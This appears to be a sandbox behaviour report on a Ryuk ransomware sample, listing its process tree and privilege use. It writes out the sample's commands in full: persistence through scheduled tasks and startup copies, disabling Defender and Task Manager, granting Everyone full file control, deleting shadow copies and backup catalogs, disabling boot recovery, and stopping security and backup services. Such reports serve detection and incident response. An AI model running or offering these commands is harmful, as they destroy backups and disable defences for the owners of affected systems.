1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

taskkill.exetaskkill.exeWMIC.exevssvc.exetaskkill.exetaskkill.exetaskkill.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exe

description	pid	process
Token: SeDebugPrivilege	3764	taskkill.exe
Token: SeDebugPrivilege	3772	taskkill.exe
Token: SeIncreaseQuotaPrivilege	2180	WMIC.exe
Token: SeSecurityPrivilege	2180	WMIC.exe
Token: SeTakeOwnershipPrivilege	2180	WMIC.exe
Token: SeLoadDriverPrivilege	2180	WMIC.exe
Token: SeSystemProfilePrivilege	2180	WMIC.exe
Token: SeSystemtimePrivilege	2180	WMIC.exe
Token: SeProfSingleProcessPrivilege	2180	WMIC.exe
Token: SeIncBasePriorityPrivilege	2180	WMIC.exe
Token: SeCreatePagefilePrivilege	2180	WMIC.exe
Token: SeBackupPrivilege	2180	WMIC.exe
Token: SeRestorePrivilege	2180	WMIC.exe
Token: SeShutdownPrivilege	2180	WMIC.exe
Token: SeDebugPrivilege	2180	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2180	WMIC.exe
Token: SeRemoteShutdownPrivilege	2180	WMIC.exe
Token: SeUndockPrivilege	2180	WMIC.exe
Token: SeManageVolumePrivilege	2180	WMIC.exe
Token: 33	2180	WMIC.exe
Token: 34	2180	WMIC.exe
Token: 35	2180	WMIC.exe
Token: 36	2180	WMIC.exe
Token: SeBackupPrivilege	3724	vssvc.exe
Token: SeRestorePrivilege	3724	vssvc.exe
Token: SeAuditPrivilege	3724	vssvc.exe
Token: SeIncreaseQuotaPrivilege	2180	WMIC.exe
Token: SeSecurityPrivilege	2180	WMIC.exe
Token: SeTakeOwnershipPrivilege	2180	WMIC.exe
Token: SeLoadDriverPrivilege	2180	WMIC.exe
Token: SeSystemProfilePrivilege	2180	WMIC.exe
Token: SeSystemtimePrivilege	2180	WMIC.exe
Token: SeProfSingleProcessPrivilege	2180	WMIC.exe
Token: SeIncBasePriorityPrivilege	2180	WMIC.exe
Token: SeCreatePagefilePrivilege	2180	WMIC.exe
Token: SeBackupPrivilege	2180	WMIC.exe
Token: SeRestorePrivilege	2180	WMIC.exe
Token: SeShutdownPrivilege	2180	WMIC.exe
Token: SeDebugPrivilege	2180	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2180	WMIC.exe
Token: SeRemoteShutdownPrivilege	2180	WMIC.exe
Token: SeUndockPrivilege	2180	WMIC.exe
Token: SeManageVolumePrivilege	2180	WMIC.exe
Token: 33	2180	WMIC.exe
Token: 34	2180	WMIC.exe
Token: 35	2180	WMIC.exe
Token: 36	2180	WMIC.exe
Token: SeDebugPrivilege	2148	taskkill.exe
Token: SeDebugPrivilege	4312	taskkill.exe
Token: SeDebugPrivilege	4348	taskkill.exe
Token: SeSecurityPrivilege	1576	wevtutil.exe
Token: SeBackupPrivilege	1576	wevtutil.exe
Token: SeSecurityPrivilege	2868	wevtutil.exe
Token: SeBackupPrivilege	2868	wevtutil.exe
Token: SeSecurityPrivilege	1476	wevtutil.exe
Token: SeBackupPrivilege	1476	wevtutil.exe
Token: SeSecurityPrivilege	3340	wevtutil.exe
Token: SeBackupPrivilege	3340	wevtutil.exe
Token: SeSecurityPrivilege	880	wevtutil.exe
Token: SeBackupPrivilege	880	wevtutil.exe
Token: SeSecurityPrivilege	3388	wevtutil.exe
Token: SeBackupPrivilege	3388	wevtutil.exe
Token: SeSecurityPrivilege	4544	wevtutil.exe
Token: SeBackupPrivilege	4544	wevtutil.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1652 wrote to memory of 3956	1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1652 wrote to memory of 3956	1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 3956 wrote to memory of 4836	3956	cmd.exe	schtasks.exe
PID 3956 wrote to memory of 4836	3956	cmd.exe	schtasks.exe
PID 1652 wrote to memory of 4860	1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1652 wrote to memory of 4860	1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1652 wrote to memory of 4976	1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1652 wrote to memory of 4976	1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1652 wrote to memory of 3884	1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1652 wrote to memory of 3884	1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 3884 wrote to memory of 1292	3884	cmd.exe	schtasks.exe
PID 3884 wrote to memory of 1292	3884	cmd.exe	schtasks.exe
PID 1652 wrote to memory of 620	1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1652 wrote to memory of 620	1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 620 wrote to memory of 4192	620	cmd.exe	attrib.exe
PID 620 wrote to memory of 4192	620	cmd.exe	attrib.exe
PID 1652 wrote to memory of 4360	1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1652 wrote to memory of 4360	1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 4360 wrote to memory of 1252	4360	cmd.exe	schtasks.exe
PID 4360 wrote to memory of 1252	4360	cmd.exe	schtasks.exe
PID 1652 wrote to memory of 4184	1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1652 wrote to memory of 4184	1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 4184 wrote to memory of 1676	4184	cmd.exe	schtasks.exe
PID 4184 wrote to memory of 1676	4184	cmd.exe	schtasks.exe
PID 1652 wrote to memory of 4268	1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1652 wrote to memory of 4268	1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 4268 wrote to memory of 3428	4268	cmd.exe	attrib.exe
PID 4268 wrote to memory of 3428	4268	cmd.exe	attrib.exe
PID 1652 wrote to memory of 2412	1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1652 wrote to memory of 2412	1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 2412 wrote to memory of 2344	2412	cmd.exe	attrib.exe
PID 2412 wrote to memory of 2344	2412	cmd.exe	attrib.exe
PID 1652 wrote to memory of 1056	1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1652 wrote to memory of 1056	1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1652 wrote to memory of 716	1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1652 wrote to memory of 716	1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1056 wrote to memory of 4936	1056	cmd.exe	cmd.exe
PID 1056 wrote to memory of 4936	1056	cmd.exe	cmd.exe
PID 716 wrote to memory of 2296	716	cmd.exe	reg.exe
PID 716 wrote to memory of 2296	716	cmd.exe	reg.exe
PID 1652 wrote to memory of 1832	1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1652 wrote to memory of 1832	1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1832 wrote to memory of 2264	1832	cmd.exe	cmd.exe
PID 1832 wrote to memory of 2264	1832	cmd.exe	cmd.exe
PID 1652 wrote to memory of 3892	1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1652 wrote to memory of 3892	1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1832 wrote to memory of 3764	1832	cmd.exe	taskkill.exe
PID 1832 wrote to memory of 3764	1832	cmd.exe	taskkill.exe
PID 1652 wrote to memory of 3948	1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1652 wrote to memory of 3948	1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1652 wrote to memory of 3856	1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1652 wrote to memory of 3856	1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1652 wrote to memory of 2996	1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1652 wrote to memory of 2996	1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 4936 wrote to memory of 824	4936	cmd.exe	icacls.exe
PID 4936 wrote to memory of 824	4936	cmd.exe	icacls.exe
PID 2264 wrote to memory of 3772	2264	cmd.exe	taskkill.exe
PID 2264 wrote to memory of 3772	2264	cmd.exe	taskkill.exe
PID 1652 wrote to memory of 4572	1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1652 wrote to memory of 4572	1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1652 wrote to memory of 1164	1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1652 wrote to memory of 1164	1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1164 wrote to memory of 1520	1164	cmd.exe	reg.exe
PID 1164 wrote to memory of 1520	1164	cmd.exe	reg.exe

Views/modifies file attributes 1 TTPs 5 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

268 attrib.exe
4536 attrib.exe
4192 attrib.exe
3428 attrib.exe
2344 attrib.exe

pid	process
268	attrib.exe
4536	attrib.exe
4192	attrib.exe
3428	attrib.exe
2344	attrib.exe

C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
"C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe"
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3956
- - C:\Windows\system32\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
    3⤵
    - Creates scheduled task(s)
    PID:4836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
  2⤵
  - Drops startup file
  PID:4860
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
  2⤵
  PID:4976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3884
- - C:\Windows\system32\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
    3⤵
    - Creates scheduled task(s)
    PID:1292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:620
- - C:\Windows\system32\attrib.exe
    attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
    3⤵
    - Drops startup file
    - Views/modifies file attributes
    PID:4192
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe" /RU SYSTEM /RL HIGHEST /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4360
- - C:\Windows\system32\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe" /RU SYSTEM /RL HIGHEST /F
    3⤵
    - Creates scheduled task(s)
    PID:1252
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe" /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4184
- - C:\Windows\system32\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:1676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4268
- - C:\Windows\system32\attrib.exe
    attrib +h +s ryuk.exe
    3⤵
    - Views/modifies file attributes
    PID:3428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2412
- - C:\Windows\system32\attrib.exe
    attrib +h +s C:\ProgramData\ryuk.exe
    3⤵
    - Views/modifies file attributes
    PID:2344
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:716
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
    3⤵
    PID:2296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1056
- - C:\Windows\system32\cmd.exe
    cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4936
  - - C:\Windows\system32\icacls.exe
      icacls * /grant Everyone:(OI)(CI)F /T /C /Q
      4⤵
      Modifies file permissions
      PID:824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1832
- - C:\Windows\system32\cmd.exe
    cmd.exe /c taskkill /t /f /im sql*
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2264
  - - C:\Windows\system32\taskkill.exe
      taskkill /t /f /im sql*
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3772
- - C:\Windows\system32\taskkill.exe
    taskkill /f /t /im veeam*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1
  2⤵
  PID:3892
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2
  2⤵
  PID:3948
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID
  2⤵
  PID:3856
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1
  2⤵
  PID:2996
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "
  2⤵
  PID:4572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1164
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    PID:1520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  2⤵
  PID:3556
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:2368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
  2⤵
  PID:4100
- - C:\Windows\system32\reg.exe
    reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
    3⤵
    PID:948
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
  2⤵
  PID:3768
- - C:\Windows\system32\reg.exe
    reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
    3⤵
    PID:4212
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c "C:\ProgramData\RyukReadMe.txt " && exit
  2⤵
  PID:2012
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "C:\ProgramData\RyukReadMe.txt "
    3⤵
    - Checks computer location settings
    - Modifies registry class
    PID:1424
  - - C:\Windows\system32\NOTEPAD.EXE
      "C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\RyukReadMe.txt
      4⤵
      Opens file in notepad (likely ransom note)
      PID:2492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet
  2⤵
  PID:620
- - C:\Windows\system32\cmd.exe
    cmd.exe /c vssadmin Delete Shadows /All /Quiet
    3⤵
    PID:3004
  - - C:\Windows\system32\vssadmin.exe
      vssadmin Delete Shadows /All /Quiet
      4⤵
      Interacts with shadow copies
      PID:4772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c wmic shadowcopy delete
  2⤵
  PID:2724
- - C:\Windows\system32\cmd.exe
    cmd.exe /c wmic shadowcopy delete
    3⤵
    PID:3392
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic shadowcopy delete
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2180
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures
  2⤵
  PID:4556
- - C:\Windows\system32\cmd.exe
    cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures
    3⤵
    PID:216
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} boostatuspolicy ignoreallfailures
      4⤵
      Modifies boot configuration data using bcdedit
      PID:3100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} recoveryenabled no
  2⤵
  PID:544
- - C:\Windows\system32\cmd.exe
    cmd.exe /c bcdedit /set {default} recoveryenabled no
    3⤵
    PID:2424
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} recoveryenabled no
      4⤵
      Modifies boot configuration data using bcdedit
      PID:4992
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c wbadmin delete catalog -quiet/
  2⤵
  PID:4332
- - C:\Windows\system32\cmd.exe
    cmd.exe /c wbadmin delete catalog -quiet/
    3⤵
    PID:4212
  - - C:\Windows\system32\wbadmin.exe
      wbadmin delete catalog -quiet/
      4⤵
      Deletes backup catalog
      Drops file in Windows directory
      PID:728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop avpsus /y
  2⤵
  PID:4320
- - C:\Windows\system32\net.exe
    net stop avpsus /y
    3⤵
    PID:772
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop avpsus /y
      4⤵
      PID:3468
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop McAfeeDLPAgentService /y
  2⤵
  PID:3672
- - C:\Windows\system32\net.exe
    net stop McAfeeDLPAgentService /y
    3⤵
    PID:3356
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
      4⤵
      PID:4368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop mfewc /y
  2⤵
  PID:1104
- - C:\Windows\system32\net.exe
    net stop mfewc /y
    3⤵
    PID:1656
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mfewc /y
      4⤵
      PID:2616
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop BMR Boot Service /y
  2⤵
  PID:1844
- - C:\Windows\system32\net.exe
    net stop BMR Boot Service /y
    3⤵
    PID:3448
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BMR Boot Service /y
      4⤵
      PID:2964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop NetBackup BMR MTFTP Service /y
  2⤵
  PID:2300
- - C:\Windows\system32\net.exe
    net stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:2324
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
      4⤵
      PID:5048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY start=disabled
  2⤵
  PID:4128
- - C:\Windows\system32\sc.exe
    sc config SQLTELEMETRY start=disabled
    3⤵
    - Launches sc.exe
    PID:2396
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:536
- - C:\Windows\system32\sc.exe
    sc config SQLTELEMETRY$ECWDB2 start= disabled
    3⤵
    - Launches sc.exe
    PID:4788
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config SQLWriter start= disabled
  2⤵
  PID:4720
